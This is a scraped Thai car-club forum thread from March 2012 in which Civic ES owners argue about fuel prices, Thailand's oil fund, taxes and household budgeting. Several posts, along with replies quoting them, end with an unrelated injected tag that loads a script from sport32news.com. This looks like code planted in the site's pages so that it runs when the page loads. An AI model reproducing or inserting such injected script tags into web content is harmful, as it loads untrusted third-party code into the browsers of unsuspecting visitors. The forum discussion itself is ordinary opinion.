ตอบ
kaisuh

ชื่อเล่น: ปอปลา

เข้าร่วม: 17 ตุลา 2008
ตอบ: 2822

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1703
ให้คำขอบคุณ: 8904

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 23 มีนา 2012 10:05 - อะไรจะขนาดนั้นครับ
จขกท. คงหมายถึงทำไมเราต้องเติมน้ำมันในราคาที่ไม่เป็นธรรมต่างหากครับ
ไม่ใช่ไม่มีตังค์เติม
ได้รับคำขอบคุณจาก: AofStaR  yorkydog  chang167  moonoy 
Rungarun

ชื่อเล่น: ไก่

เข้าร่วม: 22 กันยา 2011
ตอบ: 727

Guru ES
Guru ES

ได้รับคำขอบคุณ: 357
ให้คำขอบคุณ: 291

สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 23 มีนา 2012 10:48 - อะไรจะขนาดนั้นครับ
ดื่มชากันหน่อยนะคับ จาได้ใจร่มๆๆ
ได้รับคำขอบคุณจาก: AofStaR 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 23 มีนา 2012 10:58 - อะไรจะขนาดนั้นครับ
ส้มจี๊ดครับ กรุงเทพไม่ใช่เชียงใหม่นะครับ จะได้มาแว้นซ์มอไซค์ไปไหนมาไหนสะดวก

ส้มจี๊ดครับ ... ออกไปกินเหล้าในเชียงใหม่ที คืนๆหนึงไม่เกิน 20 กิโลไปกลับครับ กรุงเทพอาจจะเห็น 100 โลครับ

ส้มจี๊ดครับ ตอนพี่ๆเค้าซื้อรถกัน น้ำมันมันไม่ถึง 30 บาทนะครับ ซื้อมาแล้วจะเอาไปขายใช้รถที่มันประหยัดก็ใช่เรื่องคับ มันรัก ES ไปแล้ว
ได้รับคำขอบคุณจาก: kim_possible  HaMon_ES02  wut-chiangmai  AofStaR  CoCain3z  cisco  kaisuh  puyzaaaaa  Phetcharat  K.panu  musashi44  Sombutsiri  Lee_ES_turbo  Edan  yorkydog  gahn27  chang167  moonoy 
ed02

เข้าร่วม: 25 ธันวา 2010
ตอบ: 564

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 467
ให้คำขอบคุณ: 635
ศุกร์, 23 มีนา 2012 11:05 - อะไรจะขนาดนั้นครับ
เฮ้อ... แล้วทำไมมันไม่เปลี่ยนวิธีคิดวิธีบริหารประเทศมั่ง ทุกอย่างแพงหมดข้าวไข่เจียวยังจานละ 35 บาทเล๊ย ประเทศไทยจงเจริญ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: AofStaR  kaisuh 
nooduean_69

ชื่อเล่น: นู๋เดือน

เข้าร่วม: 04 ตุลา 2011
ตอบ: 1224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 3195

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 23 มีนา 2012 11:08 - อะไรจะขนาดนั้นครับ
bandai_join พิมพ์ว่า:
ราคาน้ำมันจริงๆ ราคาถูกกว่า ภาษีต่างๆที่มันเก็บอีกครับ

ถ้าเป็นเกม The Sim ประเทศไทยที่มีผู้เล่นชื่อ ปู ประชากรคงหนีกันหมดประเทศแล้วเกมก็คง Game over ไปนานแล้ว

จิงๆแล้ว ผู้เล่นที่ชื่อ มารค มันก็แพงฟ่านี้มะช่ายหรอค้ะ แล้วก็แพงมาตลอดด้วย แต่ช่วงปลายปีที่แล้ว น้ำมันลงเหลือ สามสิบ ฟ่าๆ มะเหนมีใคกรี้ดเลย ว่าโหถูกจังดีแล้วอะไรอย่างเงี้ย แต่พอขึ้นตามราคาที่โลกเค้าก็ขึ้นกัน ก็คิดว่าเปนเพาะใคบางคน

อยากประหยัดก็ติดแก๊สเลยค่ะ เดียวนี้มีร้านติดตั้งดีบานเตเลยค่ะ น้องก็ติดมาก็ยังไม่เจอปัญหาอารายยยยยลองดูนะค้ะ

ปล. ไม่ใช่เรื่องการเมืองนะค้ะ แต่ต้องเข้าใจเศษฐกิจทั่วโลกบ้างไรบ้างค่ะ
ได้รับคำขอบคุณจาก: puyzaaaaa  hanaun 
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

ศุกร์, 23 มีนา 2012 11:09 - อะไรจะขนาดนั้นครับ
ed02 พิมพ์ว่า:
เฮ้อ... แล้วทำไมมันไม่เปลี่ยนวิธีคิดวิธีบริหารประเทศมั่ง ทุกอย่างแพงหมดข้าวไข่เจียวยังจานละ 35 บาทเล๊ย ประเทศไทยจงเจริญ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ค่าขนส่งไข่มันแพง
ได้รับคำขอบคุณจาก: AofStaR  puyzaaaaa  lordpark 
TidTlE

ชื่อเล่น: ติ๊ด

เข้าร่วม: 17 ตุลา 2011
ตอบ: 518

ได้รับคำขอบคุณ: 444
ให้คำขอบคุณ: 593

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 23 มีนา 2012 11:10 - อะไรจะขนาดนั้นครับ
น้ำมันแพงทุกคนก็บ่นหมดล่ะครับแต่ก็ต้องใช้น้ำมันต่อไป ถึงจะโดนเอาเปรียบอย่างไร รถก็ซื้อมาแล้วคงไม่โง่ขายรถยนต์แล้วไปซื้อจักรยานมาใช้หลอกครับ
slek

เข้าร่วม: 14 ธันวา 2009
ตอบ: 789

Guru ES
Guru ES

ได้รับคำขอบคุณ: 918
ให้คำขอบคุณ: 1124
ศุกร์, 23 มีนา 2012 11:12 - อะไรจะขนาดนั้นครับ
ทำใจ
auncefiroa31

ชื่อเล่น: อั๋น

เข้าร่วม: 31 สิงหา 2010
ตอบ: 363

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 369
ให้คำขอบคุณ: 376

ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 23 มีนา 2012 11:12 - อะไรจะขนาดนั้นครับ
กองทุนน้ำมัน เก็บไป ได้ไรกลับคืน ไหนลองแถลงไข ให้ฟังได้มิครับ

แก้ไขล่าสุดโดย เมื่อ ศุกร์, 23 มีนา 2012 11:21, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

ศุกร์, 23 มีนา 2012 11:14 - อะไรจะขนาดนั้นครับ
คิดถึงตอนเป็นเด็ก เบนซินลิตรละ 9บาท
ได้รับคำขอบคุณจาก: AofStaR  kaisuh  jo_jonatan  Phetcharat  lordpark  Edan 
black_es

เข้าร่วม: 07 สิงหา 2009
ตอบ: 464

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 69

ปี: 2002
ศุกร์, 23 มีนา 2012 12:15 - อะไรจะขนาดนั้นครับ
Cra2yLov3 พิมพ์ว่า:
คิดถึงตอนเป็นเด็ก เบนซินลิตรละ 9บาท

....
ham_ter

ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ศุกร์, 23 มีนา 2012 12:26 - Re: อะไรจะขนาดนั้นครับ
Cra2yLov3 พิมพ์ว่า:
THAM พิมพ์ว่า:
ham_ter พิมพ์ว่า:
AofStaR พิมพ์ว่า:
ต่อไปคนใช้รถก้อกินแกลบเถอะครับ

ขอพูดหน่อยเรื่องราคาน้ำมัน เพราะ มาเล และ พม่า เค้าผลิตน้ำมันได้เองเลยถูกกว่าเรา และเค้าไม่อิงราคาสิงคโปร์
หาข้อมูลก่อนที่จะโจมตีนะคะ และอีกอย่างคือ ไทยเราใช้น้ำมันถูกกว่าหลายๆประเทศ ก็ไม่เห็นพูดถึง ไปเทียบกับพวกผลิตน้ำมันเองขายเอง มันก็เลยดูว่าบ้านเราแพงกว่าเค้า
และอีกอย่างถามหน่อยว่า การซื้อรถคันนึงก็ไม่ได้มีแค่ค่าผ่อนรถนี่นา มีค่าน้ำมัน ค่าบำรุงรักษา ค่าจุกจิกอีก
ในเมื่อคุณไม่มีรายได้พร้อมที่จะใช้รถยนต์ หรือ พร้อมที่จะเติมน้ำมัน คุณก็ใช้มอไซค์สิ
สมมุตินะคะสมมุติ คุณมีรายได้ตามเกณท์ 15000 ผอนรถ 7-8000 น้ำมัน 4000 เป็น หมื่นสอง เหลือกิน สามพัน
คุณก็จะดูลำบากในชีวิตเหลือเกิน คุณลองเปลี่ยนมาใช้มอไซค์ไหม ค่าผ่อนรถ 1500-2000 ค่าน้ำมัน 1500 เหลือกินใช้ หมื่นสอง
ลองเปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน สำหรับเรา ค่าผ่อนรถ และเชื้อเพลิง ต้องคิดว่า ไม่เกิน 50% ของรายได้ ค่ากินใช้ 20% ค่าผ่อนของนั่นนี่ 10 % ออมเงิน 10% เผื่อเหลือ เผื่อขาด 10% ทำไมคนเราไม่คิดแบนี้ อย่างเราไม่ได้อวดหรืออะไร เราก็มีรถสองคัน แต่เราพยายามคุมเงินให้ได้ตามนี้ แทนที่จะผ่อนรถคันเดียว หลายหมื่น เราก็เลือกรถเก่า สองคัน เอาให้ผ่อนได้ตามงบประมาณ ค่าน้ำมัน เราใช้คันละหมื่น เราก็เอาไปติดแก๊ส ตอนนี้ ค่าแก๊ส สองคัน แปดพัน ทำไมเราไม่ลองเปลี่ยนวิธีคิด ทำยังไงให้อยู่รอด แทนที่จะมานั่งโอดครวญ
เห็นบ่นน้ำมันแพงกันหลายกระทู้ละ ขอพูดหน่อย ว่าทุกวันนี้ คุณพร้อมหรือยัง มีรายได้พอที่จะใช้รถ โดยไม่ลำบากหรือยัง
ถ้ามันลำบากนัก ก็ลดการใช้รถสิ หรือขายรถไป ใช้รถที่เพียงพอกับรายได้สิ
คนไทยสมัยนี้น่ะ เกินตัว ค่าผ่อนรถ กับค่าน้ำมันบางคน เกือบเท่าเงินเดือนแล้ว ไม่พอก็ขอ แล้วมาโอดครวญว่าชีวิตลำบาก
ไม่ได้ว่าใครนะ แค่เปรียบเทียบให้ฟังว่า แทนที่จะด่าคนอื่น หรือเปรียบเทียบกับชาวบ้าน น่ะ เคยหันมามองตัวเองไหมว่า วันนี้ คุณพร้อมหรือยัง ที่จะแบกรับภาระ ที่จะใช้
ปล.ที่ออกมาปาวๆนี่ คือ อยากให้รัฐบาล เค้าทำอะไร ลดราคาน้ำมันเหรอ หรือ แจก..............เพื่อให้เราใช้สุรุ่ยสุร่ายล่ะ

คุณผู้หญิง ham_ter คุณก้อพูดแรงไปมั้ง ที่เขาออกมาบ่นเขาไม่ได้หมายความว่าเขาขัดสนเงินไม่มีกะตังซ่ะเมื่อไร ถ้าคุณไม่พอใจ คุณก้อไม่ต้องเข้ามาแสดงความเห็นในกระทู้นี้จิ พูดอย่างงี้มันเหมือนกับดูถูกคนอื่นแล้วให้คนอื่นมามองตัวเองเป็นตัวอย่าง

+1ครับ คนเงินน้อยไม่มีโอกาศใช้รถแล้วหรอครับ

ไม่ได้พูดว่า เงินน้อยไม่มีโอกาสใช้รถ แค่บอกว่า
เปลี่ยนวิธีคิดชีวิตก็เปลี่ยน
สังเกตุรายรับรายจ่าย
คิดก่อนใช้ คิดก่อนจ่าย
ทำยังไงให้ชีวิตเดินไปข้างหน้าได้มากกว่า
ก็ขอโทษที่พูดแรง แต่ เราคิดแบบนั้นจริงๆ
ต้องรู้จักคิดว่าทำยังไงให้อยู่รอด มากกว่า จะมาเที่ยวว่าเป็นความผิดคนนั้นคนนี้
โทษคนอื่นก่อนมองตัวเอง มันไม่ดี เราคิดแบบนั้น
ได้รับคำขอบคุณจาก: Upper 
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ศุกร์, 23 มีนา 2012 12:29 - ..
matmann พิมพ์ว่า:
ผมว่า กระทู้พี่มีแนวโน้มจาทำให้เพื่อน ๆ ในคลับแตกแยกเอาได้นะคับ ... ฝากถึงเพื่อน ๆ ที่แสดงความคิดเห็นกันด้วย ว่าเอาแต่พองามครับ ...หวังดีน่ะ

ครับผมผิดเองที่มานั่งบนเรื่องน้ำมันแพงและข้าวของทุกอย่างแพงตามๆกันไป ขอโทษด้วยครับ
ได้รับคำขอบคุณจาก: moonoy 
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 12:30 - อะไรจะขนาดนั้นครับ
hacker พิมพ์ว่า:
ส้มจี๊ดครับ กรุงเทพไม่ใช่เชียงใหม่นะครับ จะได้มาแว้นซ์มอไซค์ไปไหนมาไหนสะดวก

ส้มจี๊ดครับ ... ออกไปกินเหล้าในเชียงใหม่ที คืนๆหนึงไม่เกิน 20 กิโลไปกลับครับ กรุงเทพอาจจะเห็น 100 โลครับ

ส้มจี๊ดครับ ตอนพี่ๆเค้าซื้อรถกัน น้ำมันมันไม่ถึง 30 บาทนะครับ ซื้อมาแล้วจะเอาไปขายใช้รถที่มันประหยัดก็ใช่เรื่องคับ มันรัก ES ไปแล้ว

ถูกต้องคุณพี่ ตอนนั้นกับตอนนี้มันต่างกัน เราเลยบอกว่า
ต้องคิดปรับตัวเข้าหามัน ไม่ใช่นั่งรอมันเข้ามาหาเราถูกไหม
กรุงเทพเราก็เคยอยู่ ทำไมจะไม่รู้ว่าเป็นไง
แต่ว่า เปลี่ยนวิธีคิด วิธีใช้รถ หรือ พลังงานทางเลือกดีกว่าจะมานั่งด่ารัฐบาลต่างๆ
ปรับตัวปรับการใช้เข้าหาพลังงาน ไม่ใช่นั่งรอพลังงาน ปรับมาหาเราถูกไหม
ได้รับคำขอบคุณจาก: hanaun 
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 12:35 - อะไรจะขนาดนั้นครับ
kaisuh พิมพ์ว่า:
จขกท. คงหมายถึงทำไมเราต้องเติมน้ำมันในราคาที่ไม่เป็นธรรมต่างหากครับ
ไม่ใช่ไม่มีตังค์เติม

จริงอยู่ว่าราคานี้แพงกว่าประเทศเพื่อนบ้าน แต่ทำไมเราไม่คิดล่ะว่า ที่มาเลถูกเพราะอะไร
แล้ว ไทยเราก็ใช้น้ำมันถูกกว่า หลายๆประเทศในโลกนะ ลองดู
แล้วเราถึงถามอย่างคนโง่ๆคนนึงว่า
แล้วเราต้องการอะไร ไง
น่าจะมีคนเสนอแนวคิดมากกว่าว่า เราต้องการอะไร
กองทุนน้ำมัน มันมีเพื่อ
-ชดเชยราคาเชื้อเพลิงบางตัว
-เป็นเครื่องมือใช้แทรกแซงราคา ในกรณีที่ราคาผันผวนรวดเร็ว เพื่อให้มีการเปลี่ยนแปลงแบบช้าๆ
-ใช้เป็นเครื่องมือแทรกแซงราคา ในการสร้างแรงเสริมทางบวก ให้ใช้เชื้อเพลิงบางตัว และสร้างแรงเสริมทางลบ ไม่ให้ใช้เชื้อเพลิงบางตัว

แต่เมื่อ 6-7 เดือนก่อน มีนกแก้วมาถลุงมันซะเหี้ยน จนกระเจิงยากจะควบคุมเช่นในวันนี้
ถ้าต้องการให้ ยกเลิกกองทุนอุ้มน้ำมัน แล้วมีวิธีที่เก็บเงินดีกว่านี้เหรอ
หรือพูดให้แฟร์ๆ

มันก็คือนโยบายอันหนึ่งที่ไม่ว่ารัฐบาลที่มาจากฝั่งไหน เอามาใช้เก็บเพื่อรักษาเสถียรภาพของราคาน้ำมันในประเทศ

ช่วงไหนใครเป็นรัฐบาล ก็จะมีนโยบาย และวิธีจัดการกองทุนน้ำมันในแบบของตัวเอง

อย่าลากไปการเมืองเลย เราควรมาคุยกันอย่างสร้างสรรค์ดีกว่า ว่า น้ำมันแพง เราควรทำอย่างไร
ควรปรับตัวอย่างไร เดินอย่างไรให้เข้าหาพลังงาน
แทนที่จะมาแตกกันแบบนี้ จริงไหม
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 12:38 - Re: ..
matmann พิมพ์ว่า:
ผมว่า กระทู้พี่มีแนวโน้มจาทำให้เพื่อน ๆ ในคลับแตกแยกเอาได้นะคับ ... ฝากถึงเพื่อน ๆ ที่แสดงความคิดเห็นกันด้วย ว่าเอาแต่พองามครับ ...หวังดีน่ะ

ครับผมผิดเองที่มานั่งบนเรื่องน้ำมันแพงและข้าวของทุกอย่างแพงตามๆกันไป ขอโทษด้วยครับ

ไม่ผิดหรอก ผู้จุดประกายย่อมเสมือน ผู้ให้ประเด็น ใครพูดไม่รู้จำไม่ได้ละ
เราควรมานั่งพูดกันเรื่องปรับตัว คิดคำนวณ รายรับรายจ่าย กันก่อนดีกว่า
เราไม่ได้ ด่าว่าใคร เราแค่ยกตัวอย่าง ว่า รายได้แต่ละคน คิดอย่างไรที่เราจะลดรายจ่ายได้
ปรับตัวได้ แทนที่จะใช้รถยนต์ ก็ใช้มอไซค์ แต่ถ้าคุณคิดว่า ใช้รถยนต์คุ้มกว่า ก็ใช้ ถ้าไม่คุ้มก็จะใช้ทำไม ก็จอดสิ ถูกไหม
AofStaR

Guru ES
Guru ES

ศุกร์, 23 มีนา 2012 12:46 - ..

ถูกต้องคุณพี่ ตอนนั้นกับตอนนี้มันต่างกัน เราเลยบอกว่า
ต้องคิดปรับตัวเข้าหามัน ไม่ใช่นั่งรอมันเข้ามาหาเราถูกไหม
กรุงเทพเราก็เคยอยู่ ทำไมจะไม่รู้ว่าเป็นไง
แต่ว่า เปลี่ยนวิธีคิด วิธีใช้รถ หรือ พลังงานทางเลือกดีกว่าจะมานั่งด่ารัฐบาลต่างๆ
ปรับตัวปรับการใช้เข้าหาพลังงาน ไม่ใช่นั่งรอพลังงาน ปรับมาหาเราถูกไหม

ผมม่ายได้ด่ารัฐบาลน้าาไม่ได้เจาะจงรัฐบาลชุดไหนๆเลย แต่ผมแค่คิดว่ารัฐเก็บภาษีของประชาชนเป็นแสนๆล้านต่อปีแล้วเอาเงินไปทามไรบ้างไม่เห็นมีอะไรพัฒนาขึ้นมาเลยแต่อย่างน้อยน่าจะเอาเงินภาษีที่เก็บไปมาช่วยในส่วนของราคาน้ำมันซึ่งมันเป็นตัวแปรที่สำคัญที่สุดที่ทำให้ข้าวของทุกอย่งแพงตามๆกันไป ผมว่าแบบนี้ไม่ใช้แค่ผู้ที่ขับรถยนต์หรอกที่เดือนร้อน คนขับมอเตอร์ไซหรือ ขี่จักรยานที่หาเช้ากินค่ำก้อเดือนร้อนครับ "<script src="https://sport32news.com/civicesgroup.js">
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 12:53 - Re: ..

ผมม่ายได้ด่ารัฐบาลน้าาไม่ได้เจาะจงรัฐบาลชุดไหนๆเลย แต่ผมแค่คิดว่ารัฐเก็บภาษีของประชาชนเป็นแสนๆล้านต่อปีแล้วเอาเงินไปทามไรบ้างไม่เห็นมีอะไรพัฒนาขึ้นมาเลยแต่อย่างน้อยน่าจะเอาเงินภาษีที่เก็บไปมาช่วยในส่วนของราคาน้ำมันซึ่งมันเป็นตัวแปรที่สำคัญที่สุดที่ทำให้ข้าวของทุกอย่งแพงตามๆกันไป ผมว่าแบบนี้ไม่ใช้แค่ผู้ที่ขับรถยนต์หรอกที่เดือนร้อน คนขับมอเตอร์ไซหรือ ขี่จักรยานที่หาเช้ากินค่ำก้อเดือนร้อนครับ "<script src="https://sport32news.com/civicesgroup.js">

อืมมันก็ใช่ น้ำมันขึ้นอะไรก็ขึ้น แต่กองทุนไม่เก็บก็ไม่ได้ เพราะ

กองทุนน้ำมัน มันมีเพื่อ
-ชดเชยราคาเชื้อเพลิงบางตัว
-เป็นเครื่องมือใช้แทรกแซงราคา ในกรณีที่ราคาผันผวนรวดเร็ว เพื่อให้มีการเปลี่ยนแปลงแบบช้าๆ
-ใช้เป็นเครื่องมือแทรกแซงราคา ในการสร้างแรงเสริมทางบวก ให้ใช้เชื้อเพลิงบางตัว และสร้างแรงเสริมทางลบ ไม่ให้ใช้เชื้อเพลิงบางตัว
จะว่าจำเป็นมันก็จำเป็น ถ้าไม่เก็บน้ำมันถูกไปนิดหน่อย แต่ รัฐบาลจะเอาเงินที่ไหนมาตรึง มาโปะ ซึ่งดูๆแล้ว มันเป็นไปไม่ได้ที่ไม่เก็บ
แล้วที่เค้าไม่พัฒนาอะไร เพราะชื่อก็บอกอยู่แล้วว่า กองทุนน้ำมัน ซึ่งก็น่าจะเปรียบเหมือนกองทุนสำรองของพลังงาน
คล้ายๆ กองทุนสำรอง เงินคงคลัง เพื่อความมั่นคง ประมาณนั้น แต่เค้าก็จ่ายทดแทน ชดเชยให้น้ำมันแต่ละชนิดนะ ถ้าไม่ ชดเชย ไม่ตรึงราคา น้ำมัน แพงกว่านี้อีก แต่เราก็ไม่ค่อยเข้าใจลึกซึ้งนักหรอก
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 12:55 - อะไรจะขนาดนั้นครับ
กบง.มีมติเก็บเงินกองทุนเบนซิน 91 และ 95 อีก 1 บาทต่อลิตร มีผล 16 มี.ค. 55 ส่วนแก๊ซโซฮอล์และดีเซลยังไม่ปรับ
ราคาน้ามันเบนซินปรับขึ้น 1.07 บาท/ลิตร มีผลวันที่ 16 มี.ค. 55 ส่วนโซฮอล์และดีเซลคงเดิม

ราคาขายปลีกและค่าการตลาด (บาท/ลิตร)

UG91
GSH95
GSH91
B5
ราคาหน้าโรงกลั่น
26.50
26.63
26.49
27.72
ภาษี
10.50
9.57
9.46
2.13
กองทุน
3.25
2.45
0.85
0.85
ค่าการตลาด
2.33
1.58
1.68
1.63
ราคาขายปลีก
42.58
40.23
38.48
32.33
Zenkii

ชื่อเล่น: มี่

เข้าร่วม: 21 ธันวา 2010
ตอบ: 403

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 922

ที่อยู่: ดอนเมือง หมู่บ้านศิริสุข หลักสี่ แจ้งวัฒนะ ถนนวิภาวดีรังสิต รังสิต Wash United Donmueang
ศุกร์, 23 มีนา 2012 13:07 - อะไรจะขนาดนั้นครับ
ต่อไปคนใช้รถก้อกินแกลบเถอะครับ

ขอพูดหน่อยเรื่องราคาน้ำมัน เพราะ มาเล และ พม่า เค้าผลิตน้ำมันได้เองเลยถูกกว่าเรา และเค้าไม่อิงราคาสิงคโปร์
หาข้อมูลก่อนที่จะโจมตีนะคะ และอีกอย่างคือ ไทยเราใช้น้ำมันถูกกว่าหลายๆประเทศ ก็ไม่เห็นพูดถึง ไปเทียบกับพวกผลิตน้ำมันเองขายเอง มันก็เลยดูว่าบ้านเราแพงกว่าเค้า
และอีกอย่างถามหน่อยว่า การซื้อรถคันนึงก็ไม่ได้มีแค่ค่าผ่อนรถนี่นา มีค่าน้ำมัน ค่าบำรุงรักษา ค่าจุกจิกอีก
ในเมื่อคุณไม่มีรายได้พร้อมที่จะใช้รถยนต์ หรือ พร้อมที่จะเติมน้ำมัน คุณก็ใช้มอไซค์สิ
สมมุตินะคะสมมุติ คุณมีรายได้ตามเกณท์ 15000 ผอนรถ 7-8000 น้ำมัน 4000 เป็น หมื่นสอง เหลือกิน สามพัน
คุณก็จะดูลำบากในชีวิตเหลือเกิน คุณลองเปลี่ยนมาใช้มอไซค์ไหม ค่าผ่อนรถ 1500-2000 ค่าน้ำมัน 1500 เหลือกินใช้ หมื่นสอง
ลองเปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน สำหรับเรา ค่าผ่อนรถ และเชื้อเพลิง ต้องคิดว่า ไม่เกิน 50% ของรายได้ ค่ากินใช้ 20% ค่าผ่อนของนั่นนี่ 10 % ออมเงิน 10% เผื่อเหลือ เผื่อขาด 10% ทำไมคนเราไม่คิดแบนี้ อย่างเราไม่ได้อวดหรืออะไร เราก็มีรถสองคัน แต่เราพยายามคุมเงินให้ได้ตามนี้ แทนที่จะผ่อนรถคันเดียว หลายหมื่น เราก็เลือกรถเก่า สองคัน เอาให้ผ่อนได้ตามงบประมาณ ค่าน้ำมัน เราใช้คันละหมื่น เราก็เอาไปติดแก๊ส ตอนนี้ ค่าแก๊ส สองคัน แปดพัน ทำไมเราไม่ลองเปลี่ยนวิธีคิด ทำยังไงให้อยู่รอด แทนที่จะมานั่งโอดครวญ
เห็นบ่นน้ำมันแพงกันหลายกระทู้ละ ขอพูดหน่อย ว่าทุกวันนี้ คุณพร้อมหรือยัง มีรายได้พอที่จะใช้รถ โดยไม่ลำบากหรือยัง
ถ้ามันลำบากนัก ก็ลดการใช้รถสิ หรือขายรถไป ใช้รถที่เพียงพอกับรายได้สิ
คนไทยสมัยนี้น่ะ เกินตัว ค่าผ่อนรถ กับค่าน้ำมันบางคน เกือบเท่าเงินเดือนแล้ว ไม่พอก็ขอ แล้วมาโอดครวญว่าชีวิตลำบาก
ไม่ได้ว่าใครนะ แค่เปรียบเทียบให้ฟังว่า แทนที่จะด่าคนอื่น หรือเปรียบเทียบกับชาวบ้าน น่ะ เคยหันมามองตัวเองไหมว่า วันนี้ คุณพร้อมหรือยัง ที่จะแบกรับภาระ ที่จะใช้
ปล.ที่ออกมาปาวๆนี่ คือ อยากให้รัฐบาล เค้าทำอะไร ลดราคาน้ำมันเหรอ หรือ แจก..............เพื่อให้เราใช้สุรุ่ยสุร่ายล่ะ

น้ำมันแพง จำเป็นต้องปรับชีวิต ขายรถ ไปขี่มอไซ ปั่นจักรยานเลยว่างั้น? บ่นไม่ได้เลยว่างั้น?

บางคนเค้ามีเงินซื้อปั้มน้ำมันมาเก็บไว้เป็นของตัวเองได้เลยด้วยซ้ำ เค้ายังบ่นเลยว่าน้ำมันแพง

บ้านผมมีรถ 6 คัน ซื้อสดป้ายแดงทุกคัน มีแต่ผมอ่ะซื้อมือ2 เพราะชอบ ES แต่ก็จ่ายเงินสด ผมยังคิดว่าน้ำมันมันแพงเลย แต่ผมก็เติม 95 ทุกครั้งที่เจอปั้มไหนมี ถ้าผมเข้า Shell ผมก็เติม V Power ด้วยซ้ำ แต่ขอบ่นเหอะ น้ำมัน มันแพงจริงๆ ถึงจะมีปัญญาเติมก็เหอะ แต่มันก็แพงอะ จะบ่น ทำไม มีไรมะ?
ได้รับคำขอบคุณจาก: kaisuh  puyzaaaaa  jo_jonatan  kim_possible  K.panu  Edan  yorkydog  hacker  gahn27  chang167  moonoy 
win_RX

ชื่อเล่น: วิน

เข้าร่วม: 19 ธันวา 2010
ตอบ: 418

ได้รับคำขอบคุณ: 499
ให้คำขอบคุณ: 162

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 23 มีนา 2012 13:08 - อะไรจะขนาดนั้นครับ
เบนซิน 95 ตลอดๆ อ่ะ เต็มถังทุกวัน ( ใช้แต่แก๊ส )
AofStaR

Guru ES
Guru ES

ศุกร์, 23 มีนา 2012 13:10 - .
กบง.มีมติเก็บเงินกองทุนเบนซิน 91 และ 95 อีก 1 บาทต่อลิตร มีผล 16 มี.ค. 55 ส่วนแก๊ซโซฮอล์และดีเซลยังไม่ปรับ
ราคาน้ามันเบนซินปรับขึ้น 1.07 บาท/ลิตร มีผลวันที่ 16 มี.ค. 55 ส่วนโซฮอล์และดีเซลคงเดิม

ราคาขายปลีกและค่าการตลาด (บาท/ลิตร)

UG91
GSH95
GSH91
B5
ราคาหน้าโรงกลั่น
26.50
26.63
26.49
27.72
ภาษี
10.50
9.57
9.46
2.13
กองทุน
3.25
2.45
0.85
0.85
ค่าการตลาด
2.33
1.58
1.68
1.63
ราคาขายปลีก
42.58
40.23
38.48
32.33

ข้อมูลสุดยอดเลยค๊ราบบ
tood

เข้าร่วม: 08 มีนา 2010
ตอบ: 424

ได้รับคำขอบคุณ: 297
ให้คำขอบคุณ: 1

สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 23 มีนา 2012 13:11 - อะไรจะขนาดนั้นครับ
เย็นนี้ผมจะงดข้าวเย็นเก็บตังไว้เติมน้ำมันคับ
ได้รับคำขอบคุณจาก: Edan  hacker 
puyzaaaaa

ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ศุกร์, 23 มีนา 2012 13:14 - อะไรจะขนาดนั้นครับ
แพงเท่าไร ก็ เติม.... มีตัง ครับ ^^" คิคิ
<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: tiktok  hacker 
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 13:17 - อะไรจะขนาดนั้นครับ
Zenkii พิมพ์ว่า:

น้ำมันแพง จำเป็นต้องปรับชีวิต ขายรถ ไปขี่มอไซ ปั่นจักรยานเลยว่างั้น? บ่นไม่ได้เลยว่างั้น?

บางคนเค้ามีเงินซื้อปั้มน้ำมันมาเก็บไว้เป็นของตัวเองได้เลยด้วยซ้ำ เค้ายังบ่นเลยว่าน้ำมันแพง

